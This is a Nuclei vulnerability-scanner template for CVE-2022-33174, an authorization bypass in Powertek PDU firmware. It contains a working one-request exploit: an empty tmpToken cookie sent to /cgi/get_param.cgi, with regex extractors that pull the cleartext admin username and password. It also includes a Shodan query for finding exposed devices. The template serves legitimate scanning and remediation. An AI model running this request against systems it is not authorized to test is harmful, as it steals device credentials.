nuclei-templates/http/cves/2022/CVE-2022-33174.yaml

55 lines
2.0 KiB
YAML

id: CVE-2022-33174
info:
name: Powertek Firmware <3.30.30 - Authorization Bypass
author: pikpikcu
severity: high
description: |
Powertek firmware (multiple brands) before 3.30.30 running Power Distribution Units are vulnerable to authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext.
remediation: |
Upgrade the Powertek Firmware to version 3.30.30 or higher to mitigate the vulnerability.
reference:
- https://gynvael.coldwind.pl/?lang=en&id=748
- https://nvd.nist.gov/vuln/detail/CVE-2022-33174
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-33174
cwe-id: CWE-863
epss-score: 0.00522
epss-percentile: 0.74234
cpe: cpe:2.3:o:powertekpdus:basic_pdu_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: powertekpdus
product: basic_pdu_firmware
shodan-query: http.html:"Powertek"
tags: cve,cve2022,powertek,auth-bypass
http:
- raw:
- |
GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1
Host: {{Hostname}}
Cookie: tmpToken=;
matchers-condition: and
matchers:
- type: word
words:
- '<sys.passwd>'
- '<sys.su.name>'
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- '<sys\.passwd>([A-Z0-9a-z]+)<\/sys\.passwd>'
- '<sys\.su\.name>([a-z]+)<\/sys\.su\.name>'
part: body
# digest: 4b0a00483046022100d08737200ada930146376031b4626550f2a0ea658e0be86297e62ef6ecff593b022100cf0571b04edc2175ffcb55da006db5f5bb9e6ebee2623772e65dec89b8faea77:922c64590222798bb761d5b6d8e72950